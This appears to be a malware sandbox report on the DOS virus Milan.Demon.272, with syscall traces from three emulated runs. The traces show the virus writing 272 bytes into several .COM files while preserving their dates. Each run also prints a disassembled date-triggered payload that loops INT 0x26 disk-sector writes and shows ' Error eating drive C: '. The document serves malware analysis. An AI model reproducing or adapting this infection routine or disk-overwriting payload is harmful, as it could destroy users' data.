Sample viewer

vx.netlux.org/Virus.DOS.Milan.Demon.272

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T21:51:09.325865511Z 78 PC: 12a4a | Find first file
2018-12-17T21:51:09.332484917Z 67 PC: 12aa2 | Get or set file attributes
2018-12-17T21:51:09.33794709Z 67 PC: 12aae | Get or set file attributes
2018-12-17T21:51:09.353922287Z 61 PC: 12ab4 | Open file (Filename = 'SLEEP.COM')
2018-12-17T21:51:09.361473231Z 87 PC: 12abe | Get or set file date and time
2018-12-17T21:51:09.362987644Z 64 PC: 12ad2 | Write file or device (Write 272 bytes on handle 5)
2018-12-17T21:51:09.369854087Z 87 PC: 12ae0 | Get or set file date and time
2018-12-17T21:51:09.372982795Z 62 PC: 12ae4 | Close file
2018-12-17T21:51:09.380165826Z 67 PC: 12af1 | Get or set file attributes
2018-12-17T21:51:09.390724553Z 79 PC: 12a59 | Find next file
2018-12-17T21:51:09.393716438Z 67 PC: 12aa2 | Get or set file attributes
2018-12-17T21:51:09.400228151Z 67 PC: 12aae | Get or set file attributes
2018-12-17T21:51:09.410600042Z 61 PC: 12ab4 | Open file (Filename = 'PRINT.COM')
2018-12-17T21:51:09.417385086Z 87 PC: 12abe | Get or set file date and time
2018-12-17T21:51:09.420561784Z 64 PC: 12ad2 | Write file or device (Write 272 bytes on handle 5)
2018-12-17T21:51:09.427374403Z 87 PC: 12ae0 | Get or set file date and time
2018-12-17T21:51:09.429127324Z 62 PC: 12ae4 | Close file
2018-12-17T21:51:09.438237594Z 67 PC: 12af1 | Get or set file attributes
2018-12-17T21:51:09.450891783Z 79 PC: 12a59 | Find next file
2018-12-17T21:51:09.453878003Z 67 PC: 12aa2 | Get or set file attributes
2018-12-17T21:51:09.460612889Z 67 PC: 12aae | Get or set file attributes
2018-12-17T21:51:09.47050742Z 61 PC: 12ab4 | Open file (Filename = 'HELLO.COM')
2018-12-17T21:51:09.477729412Z 87 PC: 12abe | Get or set file date and time
2018-12-17T21:51:09.480237453Z 64 PC: 12ad2 | Write file or device (Write 272 bytes on handle 5)
2018-12-17T21:51:09.489051244Z 87 PC: 12ae0 | Get or set file date and time
2018-12-17T21:51:09.490461741Z 62 PC: 12ae4 | Close file
2018-12-17T21:51:09.497154427Z 67 PC: 12af1 | Get or set file attributes
2018-12-17T21:51:09.505420914Z 79 PC: 12a59 | Find next file
2018-12-17T21:51:09.508057623Z 67 PC: 12aa2 | Get or set file attributes
2018-12-17T21:51:09.51861365Z 67 PC: 12aae | Get or set file attributes
2018-12-17T21:51:09.529026382Z 61 PC: 12ab4 | Open file (Filename = 'PHANG.COM')
2018-12-17T21:51:09.535446815Z 87 PC: 12abe | Get or set file date and time
2018-12-17T21:51:09.536778785Z 64 PC: 12ad2 | Write file or device (Write 272 bytes on handle 5)
2018-12-17T21:51:09.544068557Z 87 PC: 12ae0 | Get or set file date and time
2018-12-17T21:51:09.545665989Z 62 PC: 12ae4 | Close file
2018-12-17T21:51:09.553367934Z 67 PC: 12af1 | Get or set file attributes
2018-12-17T21:51:09.564055755Z 79 PC: 12a59 | Find next file
2018-12-17T21:51:09.566943426Z 67 PC: 12aa2 | Get or set file attributes
2018-12-17T21:51:09.577077329Z 67 PC: 12aae | Get or set file attributes
2018-12-17T21:51:09.590001041Z 61 PC: 12ab4 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T21:51:09.596439535Z 87 PC: 12abe | Get or set file date and time
2018-12-17T21:51:09.597752378Z 64 PC: 12ad2 | Write file or device (Write 272 bytes on handle 5)
2018-12-17T21:51:09.605274891Z 87 PC: 12ae0 | Get or set file date and time
2018-12-17T21:51:09.607020969Z 62 PC: 12ae4 | Close file
2018-12-17T21:51:09.613843332Z 67 PC: 12af1 | Get or set file attributes
2018-12-17T21:51:09.620481949Z 79 PC: 12a59 | Find next file
2018-12-17T21:51:09.623175151Z 67 PC: 12aa2 | Get or set file attributes
2018-12-17T21:51:09.628610712Z 67 PC: 12aae | Get or set file attributes
2018-12-17T21:51:09.640546295Z 61 PC: 12ab4 | Open file (Filename = 'MANDEL.COM')
2018-12-17T21:51:09.6522087Z 87 PC: 12abe | Get or set file date and time
2018-12-17T21:51:09.653909271Z 64 PC: 12ad2 | Write file or device (Write 272 bytes on handle 5)
2018-12-17T21:51:09.660780653Z 87 PC: 12ae0 | Get or set file date and time
2018-12-17T21:51:09.663330484Z 62 PC: 12ae4 | Close file
2018-12-17T21:51:09.670672797Z 67 PC: 12af1 | Get or set file attributes
2018-12-17T21:51:09.680497633Z 79 PC: 12a59 | Find next file
2018-12-17T21:51:09.684291756Z 67 PC: 12aa2 | Get or set file attributes
2018-12-17T21:51:09.690112069Z 67 PC: 12aae | Get or set file attributes
2018-12-17T21:51:09.699811244Z 61 PC: 12ab4 | Open file (Filename = 'PAH.COM')
2018-12-17T21:51:09.712538418Z 87 PC: 12abe | Get or set file date and time
2018-12-17T21:51:09.714558301Z 64 PC: 12ad2 | Write file or device (Write 272 bytes on handle 5)
2018-12-17T21:51:09.721368081Z 87 PC: 12ae0 | Get or set file date and time
2018-12-17T21:51:09.723856879Z 62 PC: 12ae4 | Close file
2018-12-17T21:51:09.902920822Z 67 PC: 12af1 | Get or set file attributes
2018-12-17T21:51:09.940182612Z 79 PC: 12a59 | Find next file
2018-12-17T21:51:09.943851622Z 42 PC: 12a64 | Get date 0x12a64: cmp al, 2
0x12a66: je 0x12a6c
0x12a68: mov ah, 0x4c
0x12a6a: int 0x21
0x12a6c: mov byte ptr [0x1be], 0
0x12a71: nop
0x12a72: jmp 0x12a74
0x12a74: mov al, byte ptr [0x1bf]
0x12a77: mov cx, 0xa0
0x12a7a: mov dx, 0
0x12a7d: mov bx, 0
0x12a80: int 0x26
0x12a82: inc byte ptr [0x1be]
0x12a86: cmp byte ptr [0x1be], 0xa
0x12a8b: je 0x12a8f
0x12a8d: jne 0x12a74
0x12a8f: mov ah, 9
0x12a91: mov dx, 0x1f6
0x12a94: int 0x21
0x12a96: mov ah, 0x4c
2018-12-17T21:51:09.946758609Z 76 PC: 12a6c | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":93,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:39:52.226032765Z 78 PC: 12a4a | Find first file
2018-12-25T11:39:52.232760789Z 67 PC: 12aa2 | Get or set file attributes
2018-12-25T11:39:52.238920943Z 67 PC: 12aae | Get or set file attributes
2018-12-25T11:39:53.681194243Z 61 PC: 12ab4 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:39:53.690283949Z 87 PC: 12abe | Get or set file date and time
2018-12-25T11:39:53.692566443Z 64 PC: 12ad2 | Write file or device (Write 272 bytes on handle 5)
2018-12-25T11:39:53.701307213Z 87 PC: 12ae0 | Get or set file date and time
2018-12-25T11:39:53.704125844Z 62 PC: 12ae4 | Close file
2018-12-25T11:39:53.717748976Z 67 PC: 12af1 | Get or set file attributes
2018-12-25T11:39:53.730505034Z 79 PC: 12a59 | Find next file
2018-12-25T11:39:53.735716848Z 67 PC: 12aa2 | Get or set file attributes (See above)
2018-12-25T11:39:53.744978718Z 67 PC: 12aae | Get or set file attributes (See above)
2018-12-25T11:39:53.756762368Z 61 PC: 12ab4 | Open file (See above)
2018-12-25T11:39:53.76513425Z 87 PC: 12abe | Get or set file date and time (See above)
2018-12-25T11:39:53.768034322Z 64 PC: 12ad2 | Write file or device (See above)
2018-12-25T11:39:53.780497181Z 87 PC: 12ae0 | Get or set file date and time (See above)
2018-12-25T11:39:53.783408568Z 62 PC: 12ae4 | Close file (See above)
2018-12-25T11:39:53.792500877Z 67 PC: 12af1 | Get or set file attributes (See above)
2018-12-25T11:39:53.799577903Z 79 PC: 12a59 | Find next file (See above)
2018-12-25T11:39:53.802399005Z 67 PC: 12aa2 | Get or set file attributes (See above)
2018-12-25T11:39:53.807907384Z 67 PC: 12aae | Get or set file attributes (See above)
2018-12-25T11:39:53.815799378Z 61 PC: 12ab4 | Open file (See above)
2018-12-25T11:39:53.821480575Z 87 PC: 12abe | Get or set file date and time (See above)
2018-12-25T11:39:53.823239026Z 64 PC: 12ad2 | Write file or device (See above)
2018-12-25T11:39:53.829295463Z 87 PC: 12ae0 | Get or set file date and time (See above)
2018-12-25T11:39:53.831040961Z 62 PC: 12ae4 | Close file (See above)
2018-12-25T11:39:53.846919895Z 67 PC: 12af1 | Get or set file attributes (See above)
2018-12-25T11:39:53.858734907Z 79 PC: 12a59 | Find next file (See above)
2018-12-25T11:39:53.862172723Z 67 PC: 12aa2 | Get or set file attributes (See above)
2018-12-25T11:39:53.869043028Z 67 PC: 12aae | Get or set file attributes (See above)
2018-12-25T11:39:53.881907093Z 61 PC: 12ab4 | Open file (See above)
2018-12-25T11:39:53.889488824Z 87 PC: 12abe | Get or set file date and time (See above)
2018-12-25T11:39:53.891526057Z 64 PC: 12ad2 | Write file or device (See above)
2018-12-25T11:39:53.911901994Z 87 PC: 12ae0 | Get or set file date and time (See above)
2018-12-25T11:39:53.913892652Z 62 PC: 12ae4 | Close file (See above)
2018-12-25T11:39:53.92269461Z 67 PC: 12af1 | Get or set file attributes (See above)
2018-12-25T11:39:53.936363325Z 79 PC: 12a59 | Find next file (See above)
2018-12-25T11:39:53.939895712Z 67 PC: 12aa2 | Get or set file attributes (See above)
2018-12-25T11:39:53.948492396Z 67 PC: 12aae | Get or set file attributes (See above)
2018-12-25T11:39:53.962054282Z 61 PC: 12ab4 | Open file (See above)
2018-12-25T11:39:53.970229243Z 87 PC: 12abe | Get or set file date and time (See above)
2018-12-25T11:39:53.972092716Z 64 PC: 12ad2 | Write file or device (See above)
2018-12-25T11:39:53.981134998Z 87 PC: 12ae0 | Get or set file date and time (See above)
2018-12-25T11:39:53.982951024Z 62 PC: 12ae4 | Close file (See above)
2018-12-25T11:39:53.99123683Z 67 PC: 12af1 | Get or set file attributes (See above)
2018-12-25T11:39:54.017696007Z 79 PC: 12a59 | Find next file (See above)
2018-12-25T11:39:54.020637666Z 67 PC: 12aa2 | Get or set file attributes (See above)
2018-12-25T11:39:54.027683698Z 67 PC: 12aae | Get or set file attributes (See above)
2018-12-25T11:39:54.039308448Z 61 PC: 12ab4 | Open file (See above)
2018-12-25T11:39:54.048092767Z 87 PC: 12abe | Get or set file date and time (See above)
2018-12-25T11:39:54.049596349Z 64 PC: 12ad2 | Write file or device (See above)
2018-12-25T11:39:54.057320019Z 87 PC: 12ae0 | Get or set file date and time (See above)
2018-12-25T11:39:54.059046573Z 62 PC: 12ae4 | Close file (See above)
2018-12-25T11:39:54.067213681Z 67 PC: 12af1 | Get or set file attributes (See above)
2018-12-25T11:39:54.07857068Z 79 PC: 12a59 | Find next file (See above)
2018-12-25T11:39:54.081692073Z 67 PC: 12aa2 | Get or set file attributes (See above)
2018-12-25T11:39:54.087933874Z 67 PC: 12aae | Get or set file attributes (See above)
2018-12-25T11:39:54.098613574Z 61 PC: 12ab4 | Open file (See above)
2018-12-25T11:39:54.106675897Z 87 PC: 12abe | Get or set file date and time (See above)
2018-12-25T11:39:54.108115486Z 64 PC: 12ad2 | Write file or device (See above)
2018-12-25T11:39:54.115896119Z 87 PC: 12ae0 | Get or set file date and time (See above)
2018-12-25T11:39:54.117908763Z 62 PC: 12ae4 | Close file (See above)
2018-12-25T11:39:54.126041339Z 67 PC: 12af1 | Get or set file attributes (See above)
2018-12-25T11:39:54.13722319Z 79 PC: 12a59 | Find next file (See above)
2018-12-25T11:39:54.140934027Z 42 PC: 12a64 | Get date 0x12a64: cmp al, 2
0x12a66: je 0x12a6c
0x12a68: mov ah, 0x4c
0x12a6a: int 0x21
0x12a6c: mov byte ptr [0x1be], 0
0x12a71: nop
0x12a72: jmp 0x12a74
0x12a74: mov al, byte ptr [0x1bf]
0x12a77: mov cx, 0xa0
0x12a7a: mov dx, 0
0x12a7d: mov bx, 0
0x12a80: int 0x26
0x12a82: inc byte ptr [0x1be]
0x12a86: cmp byte ptr [0x1be], 0xa
0x12a8b: je 0x12a8f
0x12a8d: jne 0x12a74
0x12a8f: mov ah, 9
0x12a91: mov dx, 0x1f6
0x12a94: int 0x21
0x12a96: mov ah, 0x4c
2018-12-25T11:39:54.144124099Z 9 PC: 12a96 | Display string (String= ' Error eating drive C: ')
2018-12-25T11:39:54.149873661Z 76 PC: 12a9a | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":93,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:39:52.437463764Z 78 PC: 12a4a | Find first file
2018-12-25T11:39:52.444374433Z 67 PC: 12aa2 | Get or set file attributes
2018-12-25T11:39:52.450798588Z 67 PC: 12aae | Get or set file attributes
2018-12-25T11:39:53.680293861Z 61 PC: 12ab4 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:39:53.688082642Z 87 PC: 12abe | Get or set file date and time
2018-12-25T11:39:53.692817648Z 64 PC: 12ad2 | Write file or device (Write 272 bytes on handle 5)
2018-12-25T11:39:53.700520588Z 87 PC: 12ae0 | Get or set file date and time
2018-12-25T11:39:53.702684295Z 62 PC: 12ae4 | Close file
2018-12-25T11:39:53.713088048Z 67 PC: 12af1 | Get or set file attributes
2018-12-25T11:39:53.724860499Z 79 PC: 12a59 | Find next file
2018-12-25T11:39:53.728201058Z 67 PC: 12aa2 | Get or set file attributes (See above)
2018-12-25T11:39:53.736528685Z 67 PC: 12aae | Get or set file attributes (See above)
2018-12-25T11:39:53.747740444Z 61 PC: 12ab4 | Open file (See above)
2018-12-25T11:39:53.755220923Z 87 PC: 12abe | Get or set file date and time (See above)
2018-12-25T11:39:53.759949702Z 64 PC: 12ad2 | Write file or device (See above)
2018-12-25T11:39:53.766608312Z 87 PC: 12ae0 | Get or set file date and time (See above)
2018-12-25T11:39:53.768447364Z 62 PC: 12ae4 | Close file (See above)
2018-12-25T11:39:53.778857269Z 67 PC: 12af1 | Get or set file attributes (See above)
2018-12-25T11:39:53.791526466Z 79 PC: 12a59 | Find next file (See above)
2018-12-25T11:39:53.793648911Z 67 PC: 12aa2 | Get or set file attributes (See above)
2018-12-25T11:39:53.800645093Z 67 PC: 12aae | Get or set file attributes (See above)
2018-12-25T11:39:53.812025593Z 61 PC: 12ab4 | Open file (See above)
2018-12-25T11:39:53.819951801Z 87 PC: 12abe | Get or set file date and time (See above)
2018-12-25T11:39:53.822012227Z 64 PC: 12ad2 | Write file or device (See above)
2018-12-25T11:39:53.830132408Z 87 PC: 12ae0 | Get or set file date and time (See above)
2018-12-25T11:39:53.832791386Z 62 PC: 12ae4 | Close file (See above)
2018-12-25T11:39:53.845650203Z 67 PC: 12af1 | Get or set file attributes (See above)
2018-12-25T11:39:53.875573144Z 79 PC: 12a59 | Find next file (See above)
2018-12-25T11:39:53.881618242Z 67 PC: 12aa2 | Get or set file attributes (See above)
2018-12-25T11:39:53.885954735Z 67 PC: 12aae | Get or set file attributes (See above)
2018-12-25T11:39:53.899044661Z 61 PC: 12ab4 | Open file (See above)
2018-12-25T11:39:53.932905678Z 87 PC: 12abe | Get or set file date and time (See above)
2018-12-25T11:39:53.935446745Z 64 PC: 12ad2 | Write file or device (See above)
2018-12-25T11:39:53.948830608Z 87 PC: 12ae0 | Get or set file date and time (See above)
2018-12-25T11:39:53.95162092Z 62 PC: 12ae4 | Close file (See above)
2018-12-25T11:39:53.96078061Z 67 PC: 12af1 | Get or set file attributes (See above)
2018-12-25T11:39:53.972227308Z 79 PC: 12a59 | Find next file (See above)
2018-12-25T11:39:53.975845793Z 67 PC: 12aa2 | Get or set file attributes (See above)
2018-12-25T11:39:53.982429051Z 67 PC: 12aae | Get or set file attributes (See above)
2018-12-25T11:39:53.993787315Z 61 PC: 12ab4 | Open file (See above)
2018-12-25T11:39:54.001997177Z 87 PC: 12abe | Get or set file date and time (See above)
2018-12-25T11:39:54.003864381Z 64 PC: 12ad2 | Write file or device (See above)
2018-12-25T11:39:54.01178579Z 87 PC: 12ae0 | Get or set file date and time (See above)
2018-12-25T11:39:54.014760415Z 62 PC: 12ae4 | Close file (See above)
2018-12-25T11:39:54.022798468Z 67 PC: 12af1 | Get or set file attributes (See above)
2018-12-25T11:39:54.0359656Z 79 PC: 12a59 | Find next file (See above)
2018-12-25T11:39:54.040188136Z 67 PC: 12aa2 | Get or set file attributes (See above)
2018-12-25T11:39:54.046731332Z 67 PC: 12aae | Get or set file attributes (See above)
2018-12-25T11:39:54.058336333Z 61 PC: 12ab4 | Open file (See above)
2018-12-25T11:39:54.066765965Z 87 PC: 12abe | Get or set file date and time (See above)
2018-12-25T11:39:54.068258057Z 64 PC: 12ad2 | Write file or device (See above)
2018-12-25T11:39:54.075480829Z 87 PC: 12ae0 | Get or set file date and time (See above)
2018-12-25T11:39:54.077463954Z 62 PC: 12ae4 | Close file (See above)
2018-12-25T11:39:54.085314053Z 67 PC: 12af1 | Get or set file attributes (See above)
2018-12-25T11:39:54.09596772Z 79 PC: 12a59 | Find next file (See above)
2018-12-25T11:39:54.100291236Z 67 PC: 12aa2 | Get or set file attributes (See above)
2018-12-25T11:39:54.106929948Z 67 PC: 12aae | Get or set file attributes (See above)
2018-12-25T11:39:54.120404461Z 61 PC: 12ab4 | Open file (See above)
2018-12-25T11:39:54.128266731Z 87 PC: 12abe | Get or set file date and time (See above)
2018-12-25T11:39:54.129953513Z 64 PC: 12ad2 | Write file or device (See above)
2018-12-25T11:39:54.137289769Z 87 PC: 12ae0 | Get or set file date and time (See above)
2018-12-25T11:39:54.138847429Z 62 PC: 12ae4 | Close file (See above)
2018-12-25T11:39:54.147388452Z 67 PC: 12af1 | Get or set file attributes (See above)
2018-12-25T11:39:54.158434804Z 79 PC: 12a59 | Find next file (See above)
2018-12-25T11:39:54.161532088Z 42 PC: 12a64 | Get date 0x12a64: cmp al, 2
0x12a66: je 0x12a6c
0x12a68: mov ah, 0x4c
0x12a6a: int 0x21
0x12a6c: mov byte ptr [0x1be], 0
0x12a71: nop
0x12a72: jmp 0x12a74
0x12a74: mov al, byte ptr [0x1bf]
0x12a77: mov cx, 0xa0
0x12a7a: mov dx, 0
0x12a7d: mov bx, 0
0x12a80: int 0x26
0x12a82: inc byte ptr [0x1be]
0x12a86: cmp byte ptr [0x1be], 0xa
0x12a8b: je 0x12a8f
0x12a8d: jne 0x12a74
0x12a8f: mov ah, 9
0x12a91: mov dx, 0x1f6
0x12a94: int 0x21
0x12a96: mov ah, 0x4c
2018-12-25T11:39:54.165469658Z 76 PC: 12a6c | Terminate with return code (Return code = '3')